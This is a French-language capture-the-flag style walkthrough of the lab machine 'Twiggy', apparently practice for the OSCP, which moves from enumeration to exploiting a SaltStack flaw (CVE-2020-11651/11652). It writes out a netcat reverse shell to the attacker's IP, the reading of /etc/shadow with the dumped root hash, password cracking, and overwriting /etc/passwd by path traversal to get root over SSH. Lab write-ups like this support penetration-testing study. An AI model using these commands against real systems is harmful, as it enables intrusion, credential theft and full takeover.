Twiggy

ZeroMQ Saltstack /etc/passwd

• Nom machine : Twiggy

• Difficulté : Facile

• OS : Linux

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-06 08:44 EDT
Nmap scan report for 192.168.225.62
Host is up (0.034s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
|   256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
|_  256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
8000/tcp open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (application/json).

DNS (53) : NLnet Labs NSD

└─$ dig axfr 192.168.225.62  

; <<>> DiG 9.19.19-1-Debian <<>> axfr 192.168.225.62
;; global options: +cmd
; Transfer failed.

Rien d'exploitable.

" Name Server Daemon (NSD) est un serveur DNS tournant sur systèmes de type Unix. Développé à l'origine avec le soutien du RIPE-NCC, il est actuellement maintenu par le NLnetLabs. Contrairement au serveur BIND, bien plus connu, NSD ne sert que de serveur faisant autorité : il peut servir des zones DNS, mais pas interroger d'autres serveurs. "

Name Server DaemonWikipedia

HTTP (80) : nginx 1.16.1

Gobuster

Aucun directoire/fichier trouvé

HTTP (8000) : nginx 1.16.1

Recherche google de la requête : {"clients": ["local", "local_async", "local_batch", "local_subset", "runner", "runner_async", "ssh", "wheel", "wheel_async"], "return": "Welcome"} Nous mène vers Salt-api

De plus : X-upstream : salt-api/3000-1

Une recherche google nous renvoie vers deux CVE :

• 2020-11652

• 2020-11651

Gobuster

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ gobuster dir -u http://192.168.225.62:8000/ -w //usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt,pdf,js       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.225.62:8000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                //usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              pdf,js,php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 146]
/login                (Status: 200) [Size: 43]
/events               (Status: 401) [Size: 753]
/jobs                 (Status: 401) [Size: 753]
/stats                (Status: 401) [Size: 753]
/logout               (Status: 500) [Size: 823]
/keys                 (Status: 401) [Size: 753]
/run                  (Status: 200) [Size: 146]

Rien d'intéressant

ZMTP (4505/4506) : ZeroMQ ZMTP 2.0

" Le protocole de transport de messages ZeroMQ (ZMTP) est un protocole de couche de transport permettant d'échanger des messages entre deux pairs via une couche de transport connectée telle que TCP. "

https://www.omgwiki.org/dido/doku.php?id=dido:public:ra:xapend:xapend.b_stds:defact:zmtp:start (v3)

Une recherche google de la version suivi de "exploit" nous emmène au même exploit que précédemment.

Accès initial

Exploit

Saltstack 3000.1 - Remote Code ExecutionExploit Database

Nous allons tout d'abord tester l'exploit en exécutant un ping vers notre machine kali

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ python exploit2.py --master 192.168.225.62 --exec 'ping 192.168.45.216 -c2'
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/.local/lib/python3.11/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Salt version: 3007.1
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (192.168.225.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... 
[*] root key obtained: gq/k5pft+cBTHT6tThJAAu3O5gCGufCpkylVgXDJ/wSpsXJUxpAHo1z8p9Uze7X/br2nLtoa7qQ=
[+] Attemping to execute ping 192.168.45.216 -c2 on 192.168.225.62
[+] Successfully scheduled job: 20240706130217481189

──(kali㉿kali)-[~]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:02:17.543722 IP 192.168.225.62 > 192.168.45.216: ICMP echo request, id 4444, seq 1, length 64
09:02:17.543772 IP 192.168.45.216 > 192.168.225.62: ICMP echo reply, id 4444, seq 1, length 64
09:02:18.545241 IP 192.168.225.62 > 192.168.45.216: ICMP echo request, id 4444, seq 2, length 64
09:02:18.545250 IP 192.168.45.216 > 192.168.225.62: ICMP echo reply, id 4444, seq 2, length 64

Cela fonctionne bien ! Nous allons maintenant exécuter un reverse shell.

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ python exploit2.py --master 192.168.225.62 --exec-all 'nc 192.168.49.216 1234 -e /bin/bash'

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ nc -lnvp 1234
listening on [any] 1234 ...

Aucun retour, même en changeant de port et de commande.

Nous allons essayer de récupérer /etc/shadow

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ python exploit2.py --master 192.168.225.62 -r /etc/shadow
{...}
[+] Attemping to read /etc/shadow from 192.168.225.62
root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7:::
bin:*:17834:0:99999:7:::
daemon:*:17834:0:99999:7:::

Nous allons essayer de cracker le mot de passe de root avec john.

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ echo 'root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7:::' > hash.txt
                                                                       
┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Aucun résultat après 10 minutes. Pas de retour pour /root/.ssh/id_rsa.

Agissant en tant que root, nous pouvons écrire /etc/passwd. Pour upload le fichier, ne pas oublier d'ajouter des "../../", en lien avec l'exploit.

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ python exploit2.py --master 192.168.225.62 -r /etc/passwd
{..}
[+] Attemping to read /etc/passwd from 192.168.225.62
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
{..}

Copier le fichier sur la machine local. Remplacer le x suivant root par la sortie suivante :

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ openssl passwd athenax
$1$ldcqFv9m$s3HxWhDAas11BHjxpm5vJ.

Le mot de passe ici est athenax.

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ cat passwd     
root:$1$ldcqFv9m$s3HxWhDAas11BHjxpm5vJ.:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin

Upload le fichier sur le server

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ python exploit2.py --master 192.168.225.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd

SSH

Se connecter en ssh : root:athenax

┌──(kali㉿kali)-[~/oscp/twiggy]
└─$ ssh root@192.168.225.62
{..}
[root@twiggy ~]# whoami
root

CVE-2020-16846, CVE-2020-25592: Critical Vulnerabilities in Salt Framework DisclosedTenable®